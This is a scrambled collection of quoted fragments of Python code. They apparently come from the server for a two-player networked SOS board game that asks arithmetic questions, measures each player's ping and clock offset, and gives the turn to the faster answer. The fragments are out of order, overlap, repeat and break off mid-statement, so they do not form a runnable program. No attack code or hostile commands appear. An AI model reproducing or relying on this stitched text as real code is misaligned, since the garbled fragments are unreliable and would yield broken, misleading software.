"of player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info",
"with self.lock: if self.game.state != GameState.MOVE or self.game.turn != id: # or not",
"= [None, None] print(\"Generated the Question: \" + question + \" / UUID:",
"True print(\"Both player has received the question \" + uuid) self.add_new_calibration_ts(uuid) return else:",
"* direction[0], y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0",
"None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)],",
"\"*\" else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question =",
"duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid:",
"= delta0 - delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference) def",
"seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time()",
"sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) /",
"between acknowledgment of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1]",
"\"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if operator == \"*\" else",
"+ self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx),",
"10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True if ready_to_start:",
"self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid ==",
"duration if self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 *",
"enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\")",
"self.notify_players() # Returns the normalized timestamp difference between acknowledgment of two players in",
"id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" +",
"= sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has",
"timestamps of player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0",
"== 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True if",
"+ operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question",
"for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start()",
"self.both_players_received = True print(\"Both player has received the question \" + uuid) self.add_new_calibration_ts(uuid)",
"self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board()",
"in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 # Average difference",
"range(coordinate_x - 1, coordinate_x + 2): for y in range(coordinate_y - 1, coordinate_y",
"+ self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\",",
"in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def",
"def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"]",
"self.answer_ts[1 - id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with",
"= time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock:",
"name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message =",
"args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\",",
"self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations =",
"for i in range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self,",
"close_connections(self): for conn in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y,",
"\"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in",
"question \" + uuid) self.both_players_received = True return else: return else: return time.sleep(0.2)",
"* 1000, \" ms\") print(\"Player 1 has a ping: \", ping1 * 1000,",
"self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread,",
"def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def",
"[]] self.calibrations = [[{} for _ in range(10)], [{} for _ in range(10)]]",
"self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10:",
"Returns the normalized timestamp difference between acknowledgment of two players in seconds. def",
"self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1, coordinate_x + 2):",
"\"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for",
"client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if",
"def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"]",
"ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\":",
"or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence",
"the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self,",
"for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \", ping0",
"Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if",
"uuid) self.both_players_received = True return else: return else: return time.sleep(0.2) with self.lock: if",
"if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if",
"threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the all players\") def",
"!= None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending",
"self.active_connections = [None, None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts =",
"self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the",
"utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 #",
"None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received",
"\" + question + \" / UUID: \" + self.game.question_uuid) def send_id(self, id):",
"GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]:",
"byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def",
"\"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in",
"!= id: # or not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id,",
"\" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\":",
"or self.game.turn != id: # or not self.both_players_received: return coordinate_x, coordinate_y, character =",
"two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference -",
"or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col:",
"pickle import json import sys import random import uuid import time sys.path.append('..') from",
"0 self.active_connections[id] = conn return id def remove_player(self, id): with self.lock: self.active_connections[id] =",
"self.game.turn = 1 - id else: self.game.turn = id self.notify_players() # Returns the",
"!= GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 -",
"received the question \" + uuid) self.both_players_received = True return else: return else:",
"1, coordinate_x + 2): for y in range(coordinate_y - 1, coordinate_y + 2):",
"def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] =",
"threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\",",
"= \"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x - (i -",
"= time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in range(10): for idx, conn in",
"import Game, GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\"",
"and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates:",
"[[-1, 0], [-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character",
"self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1",
"question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid):",
"= client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] ==",
"self.notify_players() def enter_name(self, id, name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn,",
"= conn return id def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id]",
"limit) number_2 = random.randint(1, limit) question = str(number_1) + operator + str(number_2) answer",
"self.ping_difference = 0 self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self,",
"- self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"]",
"sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a",
"self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts =",
"time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] != None:",
"1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self,",
"self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] =",
"self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state",
"False self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)], [{}",
"self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players()",
"return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1",
"= sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"])",
"1 if self.active_connections[0] == None: id = 0 self.active_connections[id] = conn return id",
"id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the",
"2): for direction in directions: sequence = \"\" sequence_coordinates = [] for i",
"[None, None] self.game = Game(4, 4) self.lock = threading.Lock() self.receive_question_ts = [None, None]",
"id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) +",
"import json import sys import random import uuid import time sys.path.append('..') from game",
"6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player",
"1000, \" ms\") print(\"Player 1 has a ping: \", ping1 * 1000, \"",
"self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] ==",
"6 print(\"Player 0 has a ping: \", ping0 * 1000, \" ms\") print(\"Player",
"random import uuid import time sys.path.append('..') from game import Game, GameState from utils",
"self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False def calibrate_timestamps(self):",
"self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for",
"True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the",
"< 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1]",
"in range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx,",
"self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn = id self.notify_players() # Returns",
"+= self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] +=",
"import uuid import time sys.path.append('..') from game import Game, GameState from utils import",
"question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received =",
"self.game.state != GameState.MOVE or self.game.turn != id: # or not self.both_players_received: return coordinate_x,",
"- 1) * direction[0], y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0]",
"client_send with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id]",
"{ \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message))",
"daemon=True).start() def notify_players(self): print(\"Sending Game information to the all players\") def connection_thread(self, conn,",
"Question: \" + question + \" / UUID: \" + self.game.question_uuid) def send_id(self,",
"coordinate[1]) def move(self, id, move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn",
"time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id]",
"self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"])",
"with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] =",
"<= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" + uuid) self.both_players_received =",
"a ping: \", ping0 * 1000, \" ms\") print(\"Player 1 has a ping:",
"abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid):",
"restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False",
"or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break",
"def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"] =",
"self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2",
"to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections:",
"or not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character)",
"= 0 self.active_connections[id] = conn return id def remove_player(self, id): with self.lock: self.active_connections[id]",
"def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6",
"ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the all players\")",
"= self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to",
"+ 2): for y in range(coordinate_y - 1, coordinate_y + 2): for direction",
"!= question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if not",
"y in range(coordinate_y - 1, coordinate_y + 2): for direction in directions: sequence",
"difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"]",
"= random.choice(operator_list) limit = 20 if operator == \"*\" else 100 number_1 =",
"1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\",
"[max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]])",
"with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1, coordinate_x +",
"self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn: conn.close() def calculate_score(self, id,",
"delta0 - delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self,",
"if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the all",
"self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c",
"coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]]",
"with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] =",
"/ UUID: \" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message =",
"None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations = [[{} for _",
"\", ping0 * 1000, \" ms\") print(\"Player 1 has a ping: \", ping1",
"GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE =",
"= 1 - id else: self.game.turn = id self.notify_players() # Returns the normalized",
"if self.active_connections[0] == None: id = 0 self.active_connections[id] = conn return id def",
"for x in range(coordinate_x - 1, coordinate_x + 2): for y in range(coordinate_y",
"import pickle import json import sys import random import uuid import time sys.path.append('..')",
"if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if",
"ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information",
"- id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \"",
"= False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1",
"id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1], [0, -1], [1,",
"if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row",
"enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id]",
"return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if",
"[0, 0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts = [None, None]",
"give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state",
"ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and",
"self.active_connections[0] == None: id = 0 self.active_connections[id] = conn return id def remove_player(self,",
"has received the question \" + uuid) self.both_players_received = True return else: return",
"self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts",
"import time sys.path.append('..') from game import Game, GameState from utils import string_to_byte, byte_to_string",
"if operator == \"*\" else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1,",
"uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if",
"has a ping: \", ping1 * 1000, \" ms\") self.ping_difference = ping0 -",
"self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move): with self.lock: if self.game.state",
"return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if not self.answer_ts[1 -",
"- 1, coordinate_y + 2): for direction in directions: sequence = \"\" sequence_coordinates",
"self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock:",
"answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer =",
"else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1)",
"self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the Question: \" + question",
"/ 2 for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2",
"def move(self, id, move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn !=",
"players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference)",
"self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for",
"New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20",
"move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player",
"for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference =",
"id = 1 if self.active_connections[0] == None: id = 0 self.active_connections[id] = conn",
"get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec,",
"delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference =",
"1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start",
"in seconds def __init__(self): self.active_connections = [None, None] self.game = Game(4, 4) self.lock",
"with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id] != None: ready",
"question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if not self.answer_ts[1",
"[None, None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations = [[{} for",
"(i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0",
"\"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def",
"= str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer",
"normalized timestamp difference between acknowledgment of two players in seconds. def get_timestamp_diff(self): return",
"for i in range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y -",
"= client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION: return if",
"max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6",
"0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info = [{},",
"- delta1 print(\"Calculated time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id,",
"self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1",
"i in range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn,",
"= [None, None] def add_connection(self, conn): id = 1 if self.active_connections[0] == None:",
"coordinate_y + 2): for direction in directions: sequence = \"\" sequence_coordinates = []",
"/ 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6",
"ping: \", ping0 * 1000, \" ms\") print(\"Player 1 has a ping: \",",
"\" + uuid) self.both_players_received = True return else: return else: return time.sleep(0.2) with",
"client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start",
"= False self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)],",
"[{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference",
"coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration}",
"0 self.ts_info = [{}, {}] self.answer_ts = [None, None] def add_connection(self, conn): id",
"!= GameState.QUESTION: return if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 -",
"[\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if operator == \"*\"",
"self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col +",
"= False self.answer_ts = [None, None] print(\"Generated the Question: \" + question +",
"\" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)]",
"not self.both_players_received: return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question()",
"- 1, coordinate_x + 2): for y in range(coordinate_y - 1, coordinate_y +",
"self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn = id self.notify_players()",
"= True return else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid !=",
"for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move):",
"id, move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn != id: #",
"b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections = [None, None]",
"= [None, None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the Question:",
"= \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not",
"for _ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 #",
"0 has a ping: \", ping0 * 1000, \" ms\") print(\"Player 1 has",
"self.ts_info = [{}, {}] self.answer_ts = [None, None] def add_connection(self, conn): id =",
"question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION",
"self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with",
"json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for i in",
"1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0,",
"GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections",
"add_connection(self, conn): id = 1 if self.active_connections[0] == None: id = 0 self.active_connections[id]",
"== None: id = 0 self.active_connections[id] = conn return id def remove_player(self, id):",
"conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name",
